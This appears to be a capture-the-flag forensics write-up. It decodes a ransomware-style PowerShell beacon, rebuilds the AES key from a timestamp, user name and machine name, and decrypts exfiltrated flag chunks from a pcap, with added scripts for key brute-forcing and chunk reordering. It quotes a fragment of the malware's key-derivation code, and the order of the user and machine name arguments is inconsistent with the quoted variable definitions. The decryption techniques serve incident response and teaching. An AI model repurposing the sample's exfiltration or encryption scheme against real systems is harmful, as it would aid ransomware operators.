`$XoX="0IzL5AzL5_DItASOwoDMwAiPgQmb2ZWMiBHZ18Gat4Wa3BiPgI3b0Fmc0NXaulWbkFGI+AiWsZ_TkRFaupFVaNjYqZ_akpnV0RmbWVnWy40VTJjSRJ2X1cFZHZVUlhlTtQmbOBFTxQWWShFawV1V5MVUtp0STRkWxFlaORkTHZkRWRUV4ZlVOp0VnBiP"`
* Now I'll work backwards to find the values of all the variables above:
```python
import base64
XoX="0IzL5AzL5_DItASOwoDMwAiPgQmb2ZWMiBHZ18Gat4Wa3BiPgI3b0Fmc0NXaulWbkFGI+AiWsZ_TkRFaupFVaNjYqZ_akpnV0RmbWVnWy40VTJjSRJ2X1cFZHZVUlhlTtQmbOBFTxQWWShFawV1V5MVUtp0STRkWxFlaORkTHZkRWRUV4ZlVOp0VnBiP"
print(base64.b64decode(XoX[::-1].replace("-","C").replace("_","E").strip()))
```
Output: `>gWJNVVxUDVFFGNDNjQqZDSKJmQS9WUphXRYd1LPNnd-NXeQVGdW5_bQJ2SWN2ZuVndtVzdhFjb3ZTZnhTdLFlZ > administrator > win-ho5dpb1fvnd > 00:09 - 19/09/24`
This corresponds to the variables: `> $cVl > $OgE > $zVSza > $7VEq`
- Next, from the value of `$cVl` I get the value of `$cvf` using the `R64Encoder` algorithm above: `fQKu8ge6wn1aw5mvungcVKbPlNVtePysBvsO/WXExiQoRBbJH6jB3C4aET51USIZ`
- Then I get the value of the key variable `$Uz19o` for this case:
- `$OgE = ([Environment]::MachineName).ToLower() ; $zVSza = ([Environment]::UserName).ToLower() ; $I26 = "yaginote.txt"
$7VEq = Get-Date -Format "HH:mm - dd/MM/yy" ; $Uz19o = $7VEq.replace(":","").replace(" ","").replace("-","").replace("/","")+$zVSza+$OgE`
- Suy ra được giá trị biến `$Uz19o` : `0009190924win-ho5dpb1fvndadministrator` Bây giờ mình sẽ tiến hành decrypt aes để lấy giá trị của biến `$WiETm` thôi:
- AES-CBC decryption source:
```python
import base64
import hashlib
from Crypto.Cipher import AES  # pycryptodome


def fix_base64_padding(data):
    """Re-add the '=' padding that the malware strips before sending."""
    missing_padding = len(data) % 4
    if missing_padding != 0:
        data += '=' * (4 - missing_padding)
    return data


def decrypt(data, key):
    """AES-256-CBC; the 16-byte IV is prepended to the ciphertext, PKCS#7 padding."""
    data = fix_base64_padding(data)
    data = base64.b64decode(data)
    iv = data[:16]
    data_enc = data[16:]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(data_enc)
    pad_len = decrypted[-1]
    return decrypted[:-pad_len].decode('utf-8')


# $Uz19o recovered above; the script hashes it with SHA-256 to get the AES key
key_s = "0009190924win-ho5dpb1fvndadministrator"
key = hashlib.sha256(key_s.encode()).digest()
WiETm = decrypt("fQKu8ge6wn1aw5mvungcVKbPlNVtePysBvsO/WXExiQoRBbJH6jB3C4aET51USIZ", key)
print(WiETm)  # YaMfem0zr4jdiZsDUxv1TH69
```
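The key-derivation step used above deserves a closer look, because every input to it travels in the clear in the beacon. The following is an added example, not the write-up's own code: it re-implements the `$Uz19o` construction and the SHA-256 step in Python, and goes one step further than the write-up by enumerating all 1440 candidate key materials for a calendar day (the timestamp has minute resolution), which is the fallback a responder would use if the beacon carrying `$7VEq` had not been captured. `candidate_materials` is my addition; the username and machine name are the values recovered from the pcap.

```python
import hashlib
from datetime import datetime, timedelta

# Added example, not the write-up's own code. Re-implements the key material
# recovered from the PowerShell above:
#   $Uz19o = $7VEq stripped of ':', ' ', '-', '/'  +  $zVSza  +  $OgE
# followed by SHA-256, whose digest is the AES-256 key. candidate_materials()
# is an addition: it enumerates every possible $Uz19o for one day.


def powershell_timestamp(dt: datetime) -> str:
    """Python equivalent of Get-Date -Format "HH:mm - dd/MM/yy"."""
    return dt.strftime("%H:%M - %d/%m/%y")


def key_material(timestamp: str, zVSza: str, OgE: str) -> str:
    """Mirror of the .replace() chain in the script, then the two host facts appended."""
    stripped = timestamp
    for ch in (":", " ", "-", "/"):
        stripped = stripped.replace(ch, "")
    return stripped + zVSza + OgE


def aes_key(material: str) -> bytes:
    """The script feeds $Uz19o through SHA-256 and uses the 32-byte digest as the AES key."""
    return hashlib.sha256(material.encode("utf-8")).digest()


def candidate_materials(year: int, month: int, day: int, zVSza: str, OgE: str) -> list:
    """All 1440 possible $Uz19o values for one calendar day, one per minute."""
    start = datetime(year, month, day)
    return [
        key_material(powershell_timestamp(start + timedelta(minutes=m)), zVSza, OgE)
        for m in range(24 * 60)
    ]


if __name__ == "__main__":
    # Values recovered from the $XoX beacon in the capture
    material = key_material("00:09 - 19/09/24", "win-ho5dpb1fvnd", "administrator")
    print(material)  # 0009190924win-ho5dpb1fvndadministrator
    print(aes_key(material).hex())
    print(len(candidate_materials(2024, 9, 19, "win-ho5dpb1fvnd", "administrator")))
```

The practical point for recovery is that the effective key space is the number of minutes in the infection window times one, since user and machine name are fixed per host: trying each candidate against the first 16 bytes of a known file is cheap, so the "8 hours" in the description is not a real constraint.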
**Retrieving the data from the pcap and decrypting it**
* From the resources found in the dump file, these are the flag files that were encrypted; I include the log below:
```
# Contents of the file: randomFlag.txt
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_1.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_10.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_11.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_12.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_13.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_14.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_15.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_16.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_17.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_18.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_19.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_2.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_20.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_21.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_22.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_23.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_24.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_25.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_26.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_27.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_28.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_29.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_3.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_30.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_31.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_32.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_33.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_34.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_35.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_36.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_37.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_38.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_39.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_4.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_40.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_41.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_42.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_43.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_44.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_45.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_46.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_47.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_48.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_49.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_5.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_50.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_51.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_52.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_53.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_54.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_55.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_56.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_57.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_58.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_59.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_6.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_7.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_8.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_9.txt is now encrypted"
```
Presumably the flag was split into small chunks and sent in the shuffled order shown in the log above.
* Without further ado, I'll write a script that pulls the flag data out of the pcap and puts it back together in that order:
```python=1
from scapy.all import rdpcap, TCP, Raw
import base64
from Crypto.Cipher import AES
from binascii import unhexlify

packets = rdpcap("traffic.pcapng")


def fix_base64_padding(data):
    """Re-add the '=' padding that the malware strips before sending."""
    missing_padding = len(data) % 4
    if missing_padding != 0:
        data += '=' * (4 - missing_padding)
    return data


def decrypt(data, key):
    """AES-CBC; the IV is the first 16 bytes, PKCS#7 padding; key is passed as hex."""
    key = unhexlify(key)
    iv = data[:16]
    data_enc = data[16:]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(data_enc)
    pad_len = decrypted[-1]
    return decrypted[:-pad_len].decode('utf-8')


def R64Decoder(data):
    """Undo the malware's R64 transform: reverse, '-' -> 'C', '_' -> 'E', base64."""
    data_str = data.decode('utf-8')
    data_str = data_str[::-1].replace("-", "C").replace("_", "E").strip()
    data_str = fix_base64_padding(data_str)
    return base64.b64decode(data_str)


# Collect the exfiltrated flag chunks in the order they were sent to port 443
data_flag = []
for packet in packets:
    if packet.haslayer(TCP):
        tcp_layer = packet.getlayer(TCP)
        if tcp_layer.haslayer(Raw) and tcp_layer.dport == 443:
            raw_payload = tcp_layer[Raw].load
            if len(raw_payload) == 43:  # every encrypted flag chunk has this length
                data_flag.append(R64Decoder(raw_payload))

# Because of an error I converted the key "YaMfem0zr4jdiZsDUxv1TH69" to sha256 externally
original_key = "87db61d8626cfea8e091d71753d913116f53e49804ff6eb5b7eb69ef5a521ab8"

# The flag numbers in log order tell us which chunk is which (log order == send order)
data_key_flags = []
with open("randomFlag.txt", "r") as f:  # the contents of this file are the excerpt above
    for line in f:
        line = line.strip()
        if ".txt" in line and "_" in line:
            line = line.split(".txt")[0]
            line_split = line.split("_")
            if len(line_split) > 1:
                data_key_flags.append(line_split[1])

# Map flag index -> decrypted chunk
dic = {}
for value, key_ in zip(data_flag, data_key_flags):
    dic[int(key_)] = decrypt(value, original_key)

# Print the chunks in numeric order
for i in range(1, 60):
    if i in dic:
        print(dic[i], end="")
# ASCIS{N0th1n9_1$_m0r3_pr3c10u5_7h4n_1ndEp3ndenc3_&_fr33d0m}
```
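The step that makes the script above work is the observation that the encryption log lists `flag_N.txt` in the same order the chunks were sent, so the log is the index for reordering the pcap payloads. The following is an added example, not part of the write-up's script, that isolates that step with its failure modes (count mismatch, duplicate or missing indices) on constructed data. The chunks are assumed to be already decrypted; the log excerpt is generated from a template in the same shape as the real lines, and the wire order puts `flag_10` before `flag_2` to show why a lexicographic sort would be wrong.

```python
import re

# Added example, not part of the write-up's script. Recovers chunk order from
# the encryption log on constructed data (chunks assumed already decrypted).

LOG_LINE = re.compile(r"flag_(\d+)\.txt is now encrypted")

# Same shape as the real log lines; raw string because of the backslashes
LOG_TEMPLATE = r'ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_{}.txt is now encrypted"'

# Constructed sample: the flag split into ten 2-char pieces keyed by flag index,
# sent (and logged) in this order, with flag_10 before flag_2
PIECES = {1: "AS", 2: "CI", 3: "S{", 4: "sa", 5: "mp", 6: "le", 7: "_f", 8: "la", 9: "g_", 10: "0}"}
WIRE_ORDER = [1, 10, 2, 3, 4, 5, 6, 7, 8, 9]


def sample_log() -> str:
    """The constructed randomFlag.txt-style excerpt, one line per sent chunk."""
    return "\n".join(LOG_TEMPLATE.format(i) for i in WIRE_ORDER)


def wire_chunks() -> list:
    """The chunks as they would come out of the pcap, in transmission order."""
    return [PIECES[i] for i in WIRE_ORDER]


def chunk_order_from_log(log_text: str) -> list:
    """Flag indices in the order they appear in the log (= order on the wire)."""
    return [int(m.group(1)) for m in LOG_LINE.finditer(log_text)]


def reassemble(chunks: list, order: list) -> str:
    """Pair each received chunk with its log index and join in numeric order."""
    if len(chunks) != len(order):
        raise ValueError(f"{len(chunks)} chunks but {len(order)} log entries")
    by_index = dict(zip(order, chunks))
    if len(by_index) != len(order):
        raise ValueError("duplicate flag index in log")
    missing = [i for i in range(1, max(by_index) + 1) if i not in by_index]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return "".join(by_index[i] for i in sorted(by_index))


def demo() -> str:
    """Run the full reordering on the constructed sample."""
    return reassemble(wire_chunks(), chunk_order_from_log(sample_log()))


if __name__ == "__main__":
    print("wire order :", "".join(wire_chunks()))
    print("reassembled:", demo())
```

The count check matters in practice: the script above keys on a payload length of 43, and if one packet were retransmitted or one chunk had a different length, `zip` would silently pair chunks with the wrong indices and the decrypted text would look like garbage for a reason that is hard to spot.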